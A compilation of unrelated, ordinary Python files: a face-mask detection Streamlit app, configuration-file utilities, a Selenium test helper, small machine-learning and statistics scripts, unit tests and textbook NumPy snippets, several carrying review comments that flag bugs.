# here max=0.1 while the default value is 0.5 -- the arguments look
# misordered; confirm the intended range before changing.
confidence_selected = st.sidebar.slider(
    'Select a confidence range', 0.0, 0.1, 0.5, 0.1) # display button to adjust 'confidence' between 0 - 0.5
# Helper functions to load the image and loop over the detection (for video and image options)
def detect_mask_video(image):
    """Detect faces in one video frame and classify each as mask / no-mask.

    Returns (annotated image, label, startX, startY, endX, endY, color);
    the coordinates stay 0 and color stays the initial 'g' placeholder when
    no face clears the confidence threshold.
    NOTE(review): the frame is converted BGR->RGB here and the face crop is
    converted BGR->RGB again below, which flips the crop's channels back --
    confirm against the mask model's training colour order.
    """
    label='Starting...'
    startX, startY, endX, endY = 0,0,0,0
    color = 'g'
    # Pre-process image to fit input tensor of face detection model
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # convert image from BGR to RGB
    orig = image.copy() # get a copy of the image
    (h, w) = image.shape[:2] # get image height and weight
    blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), # construct a blob from the image
        (104.0, 177.0, 123.0))
    # Set processed image as the input to the model and run forward pass to compute output
    net.setInput(blob) # pass the blob through the detection, get region that differ in propertes, and the face region
    detection = net.forward() # run forward pass to compute output of layer
    for i in range(0, detection.shape[2]): # loop through the detection
        confidence = detection[0, 0, i, 2] # extract confidence value (something to do with how well the facial region is extracted)
        if confidence > confidence_selected: # if the confidence is greater than the selected confidence from the side bar
            # Generate face bounding box
            box = detection[0, 0, i, 3:7] * np.array([w, h, w, h]) # get x and y coordinate for the bounding box
            (startX, startY, endX, endY) = box.astype("int")
            (startX, startY) = (max(0, startX), max(0, startY))
            (endX, endY) = (min(w-1, endX), min(h-1, endY)) # ensure bounding box does not exceed image frame
            # Extract face
            face = image[startY:endY, startX:endX]
            face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB) # extract face ROI, convert from BGR to RGB
            face = cv2.resize(face, (128, 128)) # resize to input tensor size of mask model (128,128 - Ewan ; 224,224 - Crib)
            face = img_to_array(face) # convert resized face to an array
            face = preprocess_input(face) # preprocess the array
            face = np.expand_dims(face, axis=0) # expand array to 2D
            # Run extracted face through mask model and label prediction
            (mask, withoutMask) = model.predict(face)[0]
            label = "Mask on" if mask > withoutMask else "No Mask"
            color = (0, 255, 0) if label == "Mask on" else (255, 0, 0) # bbox is Green if 'mask' else Red
            label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # add label probability
            # Display label and bbox rectangle in output frame
            cv2.putText(image, label, (startX, startY - 10),
                cv2.FONT_HERSHEY_SIMPLEX, 1.20, color, 2)
            cv2.rectangle(image, (startX, startY), (endX, endY), color, 2)
        else:
            continue
    return image, label, startX, startY, endX, endY, color # return image and label
def detect_mask_image(image):
    """Detect faces in an uploaded image file and classify each as mask / no-mask.

    :param image: file-like object from st.file_uploader.
    :returns: (annotated RGB image array, label string). If no face clears
        the confidence slider the image is returned unchanged with a
        fallback label (previously this raised UnboundLocalError, unlike
        the video variant which initializes `label` up front).
    """
    label = "No face detected"  # FIX: fallback so the final return never hits an unbound name
    # Pre-process image to fit input tensor of face detection model
    # FIX: np.frombuffer replaces the deprecated np.fromstring (same bytes -> uint8 view)
    image = cv2.imdecode(np.frombuffer(image.read(), np.uint8), 1) # read the image from temporary memory
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # convert image from BGR to RGB
    orig = image.copy() # get a copy of the image
    (h, w) = image.shape[:2] # get image height and weight
    blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), # construct a blob from the image
        (104.0, 177.0, 123.0))
    net.setInput(blob) # pass the blob through the detection, get region that differ in propertes, and the face region
    detection = net.forward()
    for i in range(0, detection.shape[2]): # loop through the detection
        confidence = detection[0, 0, i, 2] # extract confidence value
        if confidence > confidence_selected: # if the confidence is greater than the selected confidence from the side bar
            # Generate face bounding box
            box = detection[0, 0, i, 3:7] * np.array([w, h, w, h]) # get x and y coordinate for the bounding box
            (startX, startY, endX, endY) = box.astype("int")
            (startX, startY) = (max(0, startX), max(0, startY))
            (endX, endY) = (min(w-1, endX), min(h-1, endY)) # ensure bounding box does not exceed image frame
            # Extract face
            face = image[startY:endY, startX:endX]
            face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB) # extract face ROI, convert from BGR to RGB
            face = cv2.resize(face, (128, 128)) # resize to the mask model's input size
            face = img_to_array(face) # convert resized face to an array
            face = preprocess_input(face) # preprocess the array
            face = np.expand_dims(face, axis=0) # expand array to 2D
            # Run extracted face through mask model and label prediction
            (mask, withoutMask) = model.predict(face)[0]
            label = "Mask" if mask > withoutMask else "No Mask" # define label
            color = (0, 255, 0) if label == "Mask" else (255, 0, 0) # bbox is Green if 'mask' else Blue
            label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # add label probability
            # Display label and bbox rectangle in output frame
            cv2.putText(image, label, (startX, startY - 10),
                cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)
            cv2.rectangle(image, (startX, startY), (endX, endY), color, 2) #display label and bbox rectangle in output frame
    return image, label # return image and label
def run_video_detector():
    """Streamlit page: live webcam mask detection while the Run checkbox is on."""
    st.title("Face Mask Detector Video App :mask:") # create App title
    run = st.checkbox('Run') # checkbox to run video
    FRAME_WINDOW = st.image([])
    camera = cv2.VideoCapture(0)
    while run:
        _, frame = camera.read()
        image, label, startX, startY, endX, endY, color = detect_mask_video(frame) # call mask detection model
        FRAME_WINDOW.image(image) # NOTE: may need to crop this
    else:
        # while/else: runs once the loop condition is false (checkbox unticked).
        st.write('Stopped')
def run_image_detector():
    """Streamlit page: run mask detection on a user-uploaded image."""
    st.title("Face Mask Detector Image App :mask:") # create App title
    image_file = st.file_uploader("Upload image", type=['jpeg', 'jpg', 'png']) # streamlit function to upload file
    if image_file is not None: # Confirm that the image is not a 0 byte file
        st.sidebar.image(image_file, width=240) # then display a sidebar of the uploaded image
        if st.button("Process"): # Click button to run algorithm on input image
            image, label = detect_mask_image(image_file) # call mask detection model
            st.image(image, width=420) # display the uploaded image
            st.success('### ' + label) # display label
# Download a single file and make its content available as a string.
@st.cache(show_spinner=False)
def get_file_content_as_string(path):
    """Fetch `path` from the GitHub raw URL below and return it as UTF-8 text.

    NOTE(review): the base URL still points at streamlit's demo-self-driving
    repository (see the inline comment) -- files such as instructions.md must
    exist there, or the URL needs updating to this project's repo.
    """
    url = 'https://raw.githubusercontent.com/streamlit/demo-self-driving/master/' + path # need to change URL
    response = urllib.request.urlopen(url)
    return response.read().decode("utf-8")
# Script entry point: the stray trailing "|" (an extraction artifact that
# would be a syntax error) is removed.
if __name__ == "__main__":
    main()
import os
import ucfg_utils
import ucfg_use
'''
This class is an entry point for reconfiguration utilities.
'''
class ConfigUtilities(object):

    def __init__(self, options, component):
        '''
        @param options: global configuration options forwarded to ucfg_utils/ucfg_use
        @param component: component whose configuration files are manipulated
        '''
        self.options = options
        self.component = component
        # Paths already backed up during this run; each file is backed up once.
        self.backedup = set([])

    def setJavaProperty(self, filename, propertyName, newValue):
        '''
        Sets a single Java property (subsequent occurrences will be commented).
        If the file doesn't exist it will be created.
        @param filename: filename to change
        @param propertyName: java property to change
        @param newValue: new value of that property
        '''
        self.setJavaProperties(filename, { propertyName : newValue })

    def setJavaProperties(self, filename, propsDict):
        '''
        Sets properties; if a commented one is found the first occurrence is
        replaced. The rest, if detected, will be commented out.
        If the file doesn't exist it will be created.
        @param filename: filename to change
        @param propsDict: dictionary with java properties to set
        @todo: handle keys with spaces
        @todo: handle comments after key & value pair
        '''
        filepath = self._prepareCreating(filename)
        ucfg_utils.setJavaProperties(self.options, filepath, propsDict)

    def updateJavaPropertyNames(self, filename, propsDict):
        '''
        Updates property names.
        @param filename: filename to change
        @param propsDict: dictionary mapping old java property names to new ones
        @todo: handle keys with spaces
        @todo: handle comments after key & value pair
        '''
        filepath = self._prepareCreating(filename)
        ucfg_utils.processJavaProperties(self.options, filepath, propsDict, 'key')

    def commentJavaProperties(self, filename, propsDict):
        '''
        Comments out properties.
        @param filename: filename to change
        @param propsDict: dictionary with java properties to be commented,
            with optional extra clarifications
        @todo: handle keys with spaces
        '''
        filepath = self._prepareCreating(filename)
        ucfg_utils.processJavaProperties(self.options, filepath, propsDict, 'comment')

    def getJavaProperty(self, filename, name):
        '''
        Gets a java property value.
        @param filename: filename to read (a backup is still taken, matching
            the historical behavior of all accessors in this class)
        @param name: property key
        @todo: handle keys with spaces
        @todo: handle comments after key & value pair
        '''
        filepath = self._prepare(filename)
        return ucfg_utils.getJavaProperty(filepath, name)

    def getJavaPropertyKeys(self, filename):
        '''
        Gets the list of java property keys.
        @param filename: filename
        @todo: handle keys with spaces
        @todo: handle comments after key & value pair
        '''
        filepath = self._prepare(filename)
        return ucfg_utils.getJavaPropertyKeys(filepath)

    def setShellVariable(self, filename, variable, newValue):
        '''
        Sets a single shell configuration variable (subsequent will be commented).
        @param filename: filename to change
        @param variable: shell variable to change
        @param newValue: new value of that variable
        '''
        self.setShellVariables(filename, { variable : newValue })

    def setShellVariables(self, filename, varsDict):
        '''
        Sets multiple shell configuration variables. Subsequent occurrences of
        those being set will be commented.
        @param filename: filename to change
        @param varsDict: dictionary with shell variables to set
        @todo: handle multilines (when line ends with backslash)
        '''
        filepath = self._prepare(filename)
        ucfg_utils.setShellVariables(self.options, filepath, varsDict)

    def setXMLAttribute(self, filename, xpath, name, value):
        '''
        Sets an XML attribute value. Does nothing when the file is missing.
        @param filename: file to change
        @param xpath: XPath of the element carrying the attribute
        @param name: attribute name
        @param value: attribute value
        '''
        filepath = self._prepare(filename)
        if not os.path.exists(filepath):
            return
        # The original called self._prepare(filename) a second time here,
        # which was redundant (the path is already resolved and backed up).
        doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
        ucfg_utils.setXMLElementAttribute(self.options, doc, xpath, name, value)
        ucfg_utils.writeXMLDocument(self.options, doc, filepath)

    def removeXPathElements(self, filename, xPathExpression, nsPrefixMap = None):
        '''
        Removes elements pointed by an XPath expression.
        @param filename: file to change
        @param xPathExpression: XPath expression
        @param nsPrefixMap: prefix map of namespaces used in XPath
        '''
        # None instead of a mutable {} default; behavior is unchanged.
        if nsPrefixMap is None:
            nsPrefixMap = {}
        filepath = self._prepare(filename)
        doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
        ucfg_utils.removeXPathElements(self.options,
                                       doc, xPathExpression, nsPrefixMap)
        ucfg_utils.writeXMLDocument(self.options, doc, filepath)

    def setWSRFLiteProperty(self, filename, name, value):
        '''
        Sets a property element in a WSRFLite configuration file.
        @param filename: file to change
        @param name: property's name
        @param value: property's value
        '''
        self.setWSRFLiteProperties(filename, {name : value})

    def setWSRFLiteProperties(self, filename, valsDict):
        '''
        Sets multiple properties in a WSRFLite configuration file.
        @param filename: file to change
        @param valsDict: properties (name -> value)
        '''
        self._processWSRFLiteProperties(filename, valsDict, 'value')

    def setWSRFLitePropertyKeys(self, filename, valsDict):
        '''
        Updates keys of multiple properties in a WSRFLite configuration file.
        @param filename: file to change
        @param valsDict: properties (old name -> new name)
        '''
        self._processWSRFLiteProperties(filename, valsDict, 'key')

    def commentWSRFLiteProperties(self, filename, valsDict):
        '''
        Comments properties in a WSRFLite configuration file.
        @param filename: file to change
        @param valsDict: properties
        '''
        self._processWSRFLiteProperties(filename, valsDict, 'comment')

    def getWSRFLiteProperties(self, filename):
        '''
        Returns all properties defined in a WSRFLite configuration file.
        @param filename: file
        '''
        filepath = self._prepare(filename)
        doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
        return doc.xpath("/services/property")

    def setXNJSProperty(self, filename, name, value):
        '''
        Sets a property element in an XNJS configuration file.
        @param filename: file to change
        @param name: property's name
        @param value: property's value
        '''
        self.setXNJSProperties(filename, {name : value})

    def setXNJSProperties(self, filename, valsDict):
        '''
        Sets multiple properties in an XNJS configuration file.
        @param filename: file to change
        @param valsDict: properties
        '''
        filepath = self._prepare(filename)
        doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
        # Deterministic (sorted) order keeps the rewritten file stable.
        for prop in sorted(valsDict):
            ucfg_use.setXNJSEngineProperty(self.options, doc, prop, valsDict[prop])
        ucfg_utils.writeXMLDocument(self.options, doc, filepath)

    def toggleWSRFLiteService(self, filename, serviceName, enabled = True):
        '''
        Sets the enabled attribute in a WSRFLite configuration file.
        @param filename: file
        @param serviceName: service name
        @param enabled: if service is enabled (default: True)
        '''
        self.toggleWSRFLiteServices(filename, {serviceName: enabled})

    def toggleWSRFLiteServices(self, filename, servicesDict):
        '''
        Sets enabled attributes in a WSRFLite configuration file.
        @param filename: file
        @param servicesDict: pairs, service name -> Boolean
        '''
        filepath = self._prepare(filename)
        doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
        for prop in sorted(servicesDict):
            ucfg_use.toggleWSRFLiteService(self.options,
                                           doc, prop, servicesDict[prop])
        ucfg_utils.writeXMLDocument(self.options, doc, filepath)

    def appendXNJSProcessor(self, filename, processorClass):
        '''
        Appends a processor to the JSDL Processing Chain.
        @param filename: file to change
        @param processorClass: processor class name to append
        '''
        filepath = self._prepare(filename)
        doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
        ucfg_use.appendToJSDLProcessingChain(self.options, doc, processorClass)
        ucfg_utils.writeXMLDocument(self.options, doc, filepath)

    def addXMLStringElementAfterXPath(self, filename, xmlString2Add, xPathPosition = None, nsPrefixMap = None):
        '''
        Adds an XML fragment after the position denoted by an XPath expression.
        @param filename: file to change
        @param xmlString2Add: XML fragment to insert
        @param xPathPosition: insertion point (None lets the helper decide)
        @param nsPrefixMap: prefix map of namespaces used in XPath
        '''
        # None instead of a mutable {} default; behavior is unchanged.
        if nsPrefixMap is None:
            nsPrefixMap = {}
        filepath = self._prepare(filename)
        doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
        ucfg_utils.addAdditionalXML(self.options, doc, xmlString2Add, xPathPosition, nsPrefixMap)
        ucfg_utils.writeXMLDocument(self.options, doc, filepath)

    def appendLinesIfNotAlreadyExist(self, filename, linesList):
        '''
        Appends lines to the file, but only lines that did not exist so far.
        @param filename: file to change
        @param linesList: lines to append
        '''
        filepath = self._prepare(filename)
        ucfg_utils.appendLinesIfNotAlreadyExist(self.options, filepath, linesList)

    def removeLinesIfExist(self, filename, linesList):
        '''
        Removes existing lines.
        @param filename: file to change
        @param linesList: lines to remove
        '''
        filepath = self._prepare(filename)
        ucfg_utils.removeLinesIfExist(self.options, filepath, linesList)

    def replaceFileLines(self, filename, linesDict):
        '''
        Replaces existing lines.
        @param filename: file to change
        @param linesDict: mapping of lines to their replacements
        '''
        filepath = self._prepare(filename)
        ucfg_utils.replaceFileLines(self.options, filepath, linesDict)

    def _processWSRFLiteProperties(self, filename, valsDict, mode):
        '''
        Shared implementation for the WSRFLite property setters.
        @param mode: 'value', 'key' or 'comment' (forwarded to ucfg_use)
        '''
        filepath = self._prepare(filename)
        doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
        for p in sorted(valsDict):
            ucfg_use.setWSRFLiteProperty(self.options, doc, p, valsDict[p], mode)
        ucfg_utils.writeXMLDocument(self.options, doc, filepath)

    def _prepareCreating(self, filename):
        '''
        Same as _prepare, but additionally creates an empty file when it does
        not exist yet (Java property files may legitimately start empty).
        '''
        filepath = self._prepare(filename)
        if not os.path.exists(filepath):
            open(filepath, 'w').close()
        return filepath

    def _prepare(self, filename):
        '''
        Prepares a backup if needed and returns the resolved full path.
        '''
        filepath = ucfg_utils.getFile(self.options, self.component, filename)
        if filepath not in self.backedup and os.path.isfile(filepath):
            ucfg_utils.backupFile(self.options, filepath)
            self.backedup.add(filepath)
        return filepath
|
'''
Created on Jul 3, 2013
@author: padelstein
'''
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from robot.libraries.BuiltIn import BuiltIn
class RecommendModal():
    """Robot Framework keyword library for the 'recommend' fancybox modal.

    Uses the shared WebDriverWrapper library for the driver and its explicit
    wait; interactions are dispatched through execute_script because the modal
    elements are not reliably clickable through the normal WebDriver API.
    """

    ROBOT_LIBRARY_SCOPE = 'GLOBAL'

    def __init__(self):
        self._webd_wrap = BuiltIn().get_library_instance('WebDriverWrapper')

    def _confirm_modal(self):
        """Wait until the fancybox modal body is attached to the DOM."""
        modal_present = EC.presence_of_element_located((By.CLASS_NAME, 'fancybox-inner'))
        self._webd_wrap.wait.until(modal_present, 'User modal not present')

    def close_modal(self):
        """Close the modal via its close anchor and wait for it to vanish."""
        self._confirm_modal()
        driver = self._webd_wrap._driver
        close_anchor = driver.find_element_by_class_name('fancybox-skin').find_element_by_xpath('a')
        driver.execute_script("(arguments[0]).click()", close_anchor)
        # confirms the modal is gone
        modal_gone = EC.invisibility_of_element_located((By.CLASS_NAME, 'fancybox-inner'))
        self._webd_wrap.wait.until(modal_gone)

    ########################################################################

    def submit_recommend(self):
        """Fill in and submit the whole recommendation form."""
        self._confirm_modal()
        self.enter_email()
        self.click_checkbox()
        self.enter_message()
        self.submit()

    def enter_email(self):
        """Type the recipient address into the token-list email field."""
        driver = self._webd_wrap._driver
        email_form = driver.find_element_by_id('recommend-modal').find_element_by_id('recommend-email-form')
        email_input = email_form.find_elements_by_class_name('textboxlist-bit-editable-input')[0]
        driver.execute_script('$(arguments[0]).val(arguments[1])', email_input, '1@zolabooks.com')

    def click_checkbox(self):
        """Toggle the 'share with followers' checkbox."""
        driver = self._webd_wrap._driver
        share_box = driver.find_element_by_id('uniform-share-with-followers').find_element_by_xpath('span/input')
        driver.execute_script("$(arguments[0]).click()", share_box)

    def enter_message(self):
        """Type the canned message into the form's message field."""
        driver = self._webd_wrap._driver
        message_form = driver.find_element_by_id('recommend-email-form')
        driver.execute_script('$(arguments[0]).val(arguments[1])', message_form.find_elements_by_name('message')[0], 'test')

    def submit(self):
        """Click the form's submit control."""
        driver = self._webd_wrap._driver
        send_button = driver.find_element_by_id('recommend-modal').find_element_by_id("recommend-email-form").find_element_by_xpath("footer/input")
        driver.execute_script("(arguments[0]).click()", send_button)
|
# Linear regression demo on the Boston housing data.
# Modernized: sklearn.cross_validation was removed in scikit-learn 0.20
# (train_test_split lives in sklearn.model_selection since 0.18), and the
# Python-2 print statements are now print() calls.
# NOTE(review): load_boston itself was removed in scikit-learn 1.2 for ethical
# reasons; on recent versions this script needs a replacement dataset.
from sklearn import linear_model
import pandas as pd
import numpy as np
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split

boston = load_boston()
print("here is the data", boston)

# Features and target as DataFrames.
df_x = pd.DataFrame(boston.data, columns=boston.feature_names)
df_y = pd.DataFrame(boston.target)
print("description of features", df_x.describe())
print("description of taget", df_y.describe())

# 80/20 split; fixed random_state keeps runs reproducible.
x_train, x_test, y_train, y_test = train_test_split(df_x, df_y, test_size=0.2, random_state=4)

reg = linear_model.LinearRegression()
reg.fit(x_train, y_train)
print("the regression coefficient are", reg.coef_)

a = reg.predict(x_test)
print("the predcition for ", df_y, "are ", a)
df_a = pd.DataFrame(a)
# Mean squared error on the held-out split.
print("the squred error is", np.mean((a - y_test) ** 2))
|
from unittest import TestCase
import simplejson as S
class TestDefault(TestCase):
    def test_default(self):
        """A non-serializable object (the ``type`` builtin) routed through
        ``default=repr`` must encode identically to dumping ``repr(type)``."""
        # assertEquals is a deprecated alias removed in Python 3.12; use assertEqual.
        self.assertEqual(
            S.dumps(type, default=repr),
            S.dumps(repr(type)))
|
__author__ = 'pawan'
import csv
import sys
from collections import defaultdict
from collections import Counter
import random
import math
def prepare_topic_likelihood_data(filename):
    """Generates the prior for the topicID and the likelihood data structure.

    The likelihood dict contains the topicID count for each user, i.e. the
    number of articles read by each user for a particular topic ID.
    :param filename: pass the file for the clicked data or the emailed data
        logarticlejoin.csv : contains the clicked data
        emailarticlejoin.csv: contains the emailed data
    :return: (priors, likelihood) — Counter of topicID occurrences, and a
        defaultdict(Counter) of per-user topicID counts.
    """
    priors = Counter()
    likelihood = defaultdict(Counter)
    # Context manager closes the handle; the original leaked the open file.
    with open(filename, 'r') as logfile:
        reader = csv.reader(logfile)
        next(reader)  # skip header; next() instead of py2-only reader.next()
        for line in reader:
            userid = line[0]
            topicid = line[2]
            priors[topicid] += 1
            likelihood[userid][topicid] += 1
    return priors, likelihood
def prepare_type_likelihood_data(filename):
    """Generates the prior for the typeID and the likelihood data structure.

    The likelihood dict contains the typeID count for each user, i.e. the
    number of articles read by each user for a particular type ID.
    :param filename: pass the file for the clicked data or the emailed data
        logarticlejoin.csv : contains the clicked data
        emailarticlejoin.csv: contains the emailed data
    :return: (priors, likelihood) — Counter of typeID occurrences, and a
        defaultdict(Counter) of per-user typeID counts.
    """
    priors = Counter()
    likelihood = defaultdict(Counter)
    # Context manager closes the handle; the original leaked the open file.
    with open(filename, 'r') as logfile:
        reader = csv.reader(logfile)
        next(reader)  # skip header; next() instead of py2-only reader.next()
        for line in reader:
            userid = line[0]
            typeid = line[3]
            priors[typeid] += 1
            likelihood[userid][typeid] += 1
    return priors, likelihood
"""
def random_likelihood(line, priors, likelihood):
categories = priors.keys()
return categories[int(random.random() * len(categories))]
"""
"""
def max_prior_likelihood(line,priors, likelihood):
categories = priors.keys()
return max(priors, key = lambda x: priors[x])
"""
## Two derived features (topic_throughput and type_throughput) are printed;
## they are not used by the current model but can feed a future weighted model.
def naive_likelihood(line, priors, likelihood, type_likelihood, emailfilename):
    """Generate the likelihood of a user viewing an article.

    Takes in the test line plus the priors/likelihoods built from the access
    log, and returns the log-likelihood of the user clicking the link.
    Python-2 print statements were converted to print() calls.

    :param line: CSV record "userid,articleid,topicid,typeid,..."
    :param priors: topic priors from the access log (currently unused, kept
        for signature compatibility with existing callers)
    :param likelihood: per-user topicID counts from the access log
    :param type_likelihood: per-user typeID counts from the access log
    :param emailfilename: file with the emailed (sent) articles
    :return: (userid, topicid, typeid, log joint likelihood) using the
        posterior probabilities of topicID and typeID for the user.
    """
    # Priors/likelihoods of the *sent* (email) data set.
    e_topic_priors, e_topic_likelihood = prepare_topic_likelihood_data(emailfilename)
    e_type_priors, e_type_likelihood = prepare_type_likelihood_data(emailfilename)
    line = line.strip().split(',')
    topicid = line[2]
    typeid = line[3]
    userid = line[0]
    # Total number of articles sent to this userID.
    # NOTE(review): raises ZeroDivisionError below for a user absent from the
    # access log (nArticles_read == 0) — same as the original; confirm inputs.
    nArticles_sent = float(sum(e_topic_likelihood[userid].values()))
    # Total number of articles read by this userID.
    nArticles_read = float(sum(likelihood[userid].values()))
    # Fraction of sent articles the user read; +1 avoids divide-by-zero.
    prior_seen = (nArticles_read + 1) / (nArticles_sent + 1)
    # P(topicID | Seen), floored at 1E-4 to avoid zero probabilities.
    topicid_seen = max(1E-4, likelihood[userid][topicid] / nArticles_read)
    # P(typeID | Seen), same floor.
    typeid_seen = max(1E-4, type_likelihood[userid][typeid] / nArticles_read)
    # P(Seen | topicID) and P(Seen | typeID) posteriors.
    topic_prob = (prior_seen * topicid_seen)
    type_prob = (prior_seen * typeid_seen)
    print(topic_prob, ": Likelihood of reading the topic")
    print(type_prob, ": Likelihood of reading in type")
    # Read/sent throughput per topicID and typeID; max() guards both against
    # divide-by-zero and against multiplying by zero.
    topic_read_throughput = max(1, float(likelihood[userid][topicid])) / float(max(1, (e_topic_likelihood[userid][topicid])))
    type_read_throughput = max(1, float(type_likelihood[userid][typeid])) / float(max(1, (e_type_likelihood[userid][typeid])))
    # Features generated for future use; explained in the report.
    print(topic_read_throughput, ": Topic throughput")
    print(type_read_throughput, ": Type throughput")
    # P(Seen|topicID,typeID) = P(Seen|topicID) * P(Seen|typeID) (independence).
    joint_likelihood = topic_prob * type_prob
    return (userid, topicid, typeid, math.log(joint_likelihood))
def main():
    """CLI entry point.

    sys.argv[1]: access log CSV (clicked data)
    sys.argv[2]: corresponding email-sent CSV
    Prints the log-likelihood of a hard-coded sample record.
    """
    accesslogfile = sys.argv[1]
    emailarticlesent = sys.argv[2]
    topic_priors, topic_likelihood = prepare_topic_likelihood_data(accesslogfile)
    type_priors, type_likelihood = prepare_type_likelihood_data(accesslogfile)
    # Sample record: "userid,articleid,topicid,typeid,...".
    line = "5,16654,8,23,1,Apr,3,3190"
    userid, topicid, typeid, likelihood = naive_likelihood(line, topic_priors, topic_likelihood, type_likelihood, emailarticlesent)
    print("The probability of user {0} viewing the topic {1} and typeid {2} is {3}".format(userid, topicid, typeid, likelihood))
    writefile = open('output.txt', 'w')
    ## Uncomment the code below if you don't want to run on a testing file and want to see the likelihood for an
    ## individual user for a particular article id. The log and email files have been parsed in the above format
    ## and take csv values. Individual likelihood can be observed over a period of time by entering the line and
    ## running it 3 times to observe how the likelihood changes.
    """testfile = sys.argv[3]
    testentries = open(testfile,'r')
    for line in testentries:
        userid, topicid, typeid, likelihood = naive_likelihood(line,topic_priors,topic_likelihood,type_likelihood,emailarticlesent)
        str1 = "The probability of user {0} viewing the topic {1} and typeid {2} is {3}".format(userid,topicid,typeid,likelihood)
        print(str1)
        writefile.write(str1)
    """
    # Close the output handle; the original opened it and never closed it.
    writefile.close()


# Boiler plate syntax to call main.
if __name__ == "__main__":
    main()
|
def min_rotations(name):
    """Return the minimal number of single-step rotations needed to type
    *name* on a 26-letter circular dial that starts at 'a' (position 1).

    Each step moves one letter clockwise or counter-clockwise; per letter the
    cheaper of the two directions is taken.
    """
    # Prepend 1 ('a'): the dial's starting position.
    positions = [1] + [ord(ch) - 96 for ch in name]
    return sum(
        min(abs(a - b), 26 - abs(a - b))
        for a, b in zip(positions, positions[1:])
    )


if __name__ == "__main__":
    # Guarding the I/O keeps the pure helper importable and testable.
    print(min_rotations(input().strip()))
|
from unittest.case import TestCase
from pythonbrasil.lista_2_estrutura_de_decisao.ex_11_organizacoes_tabajara import obter_porcentagem_de_aumento
class ObterPorcentagemDeAumentoTests(TestCase):
    """Boundary tests for obter_porcentagem_de_aumento (salary raise brackets)."""

    def _assert_porcentagem(self, salarios, esperada):
        # Every salary in the bracket must map to the expected raise percentage.
        for salario in salarios:
            self.assertEqual(obter_porcentagem_de_aumento(salario), esperada)

    def test_salario_igual_ou_abaixo_de_280(self):
        self._assert_porcentagem((200, 280), 20)

    def test_salario_igual_ou_abaixo_de_700(self):
        self._assert_porcentagem((500, 700), 15)

    def test_salario_igual_ou_abaixo_de_1500(self):
        self._assert_porcentagem((1000, 1500), 10)

    def test_salario_maior_que_1500(self):
        self._assert_porcentagem((1501, 30000), 5)
|
import os
import logging
import argparse
import numpy as np
from train_and_evaluate import evaluate, train
from model.net import Generator, Discriminator
from data_loader import fetch_dataloader
import utils
import torch
# Command-line interface for the GAN training run.
parser = argparse.ArgumentParser()
parser.add_argument('--output_dir', default='Result',
                    help="Result folder")
parser.add_argument('--train_path', default='Data/trainset.nc',
                    help="The training dataset path")
parser.add_argument('--restore_from', default=None,
                    help="Optional, directory or file containing weights to reload before training")

if __name__ == '__main__':
    # Load the directories from the command line
    args = parser.parse_args()
    train_path = args.train_path
    output_dir = args.output_dir
    restore_from = args.restore_from
    # Create the result sub-folders (idempotent).
    os.makedirs(output_dir + '/outputs', exist_ok = True)
    os.makedirs(output_dir + '/figures', exist_ok = True)
    os.makedirs(output_dir + '/model', exist_ok = True)
    # Set the logger
    utils.set_logger(os.path.join(args.output_dir, 'train.log'))
    # NOTE(review): `restore` is computed but not consumed in this script —
    # presumably train() reads restore_from via params elsewhere; confirm.
    if restore_from is None:
        restore = 0
    else:
        restore = 1
    # Load hyper-parameters from the json file in the output directory.
    json_path = os.path.join(args.output_dir,'Params.json')
    assert os.path.isfile(json_path), "No json file found at {}".format(json_path)
    params = utils.Params(json_path)
    # Add run-specific attributes to params (coercing json numbers to int).
    params.output_dir = output_dir
    params.lambda_gp = 10.0
    params.n_critic = 1
    params.cuda = torch.cuda.is_available()
    params.batch_size = int(params.batch_size)
    params.numIter = int(params.numIter)
    params.noise_dims = int(params.noise_dims)
    params.label_dims = int(params.label_dims)
    params.gkernlen = int(params.gkernlen)
    # fetch dataloader
    dataloader = fetch_dataloader(train_path, params)
    # Define the generator/discriminator pair.
    generator = Generator(params)
    discriminator = Discriminator(params)
    if params.cuda:
        generator.cuda()
        discriminator.cuda()
    # Define one Adam optimizer per network.
    optimizer_G = torch.optim.Adam(generator.parameters(), lr=params.lr_gen, betas=(params.beta1_gen, params.beta2_gen))
    optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=params.lr_dis, betas=(params.beta1_dis, params.beta2_dis))
    # train the model and save
    logging.info('Start training')
    loss_history = train((generator, discriminator), (optimizer_G, optimizer_D), dataloader, params)
    # plot loss history and save
    utils.plot_loss_history(loss_history, output_dir)
    # Generate sample devices over the wavelength/angle grid and save them.
    wavelengths = [w for w in range(500, 1301, 50)]
    angles = [a for a in range(35, 86, 5)]
    logging.info('Start generating devices for wavelength range {} to {} and angle range from {} to {} \n'
                 .format(min(wavelengths), max(wavelengths), min(angles), max(angles)))
    evaluate(generator, wavelengths, angles, num_imgs=500, params=params)
|
# CHAPTER 1
# Figure 1.1
# REPL-style teaching snippets. The five duplicate "import numpy as np" lines
# from the book listing were collapsed into single imports here, and a stray
# "|" artifact after the last print was removed.
import numpy as np
import matplotlib.pyplot as plt
from scipy.special import comb, factorial

# Geometric sequence X[n] = p**n plotted as a bar chart (Figure 1.1).
p = 1/2
n = np.arange(0, 10)
X = np.power(p, n)
plt.bar(n, X)

# Binomial Theorem
n = 10
k = 2
comb(n, k)      # value intentionally discarded (REPL-style demo)
factorial(k)    # value intentionally discarded (REPL-style demo)

# Python code to perform an inner product
x = np.array([[1], [0], [-1]])
y = np.array([[3], [2], [0]])
z = np.dot(np.transpose(x), y)
print(z)

# Python code to compute the norm
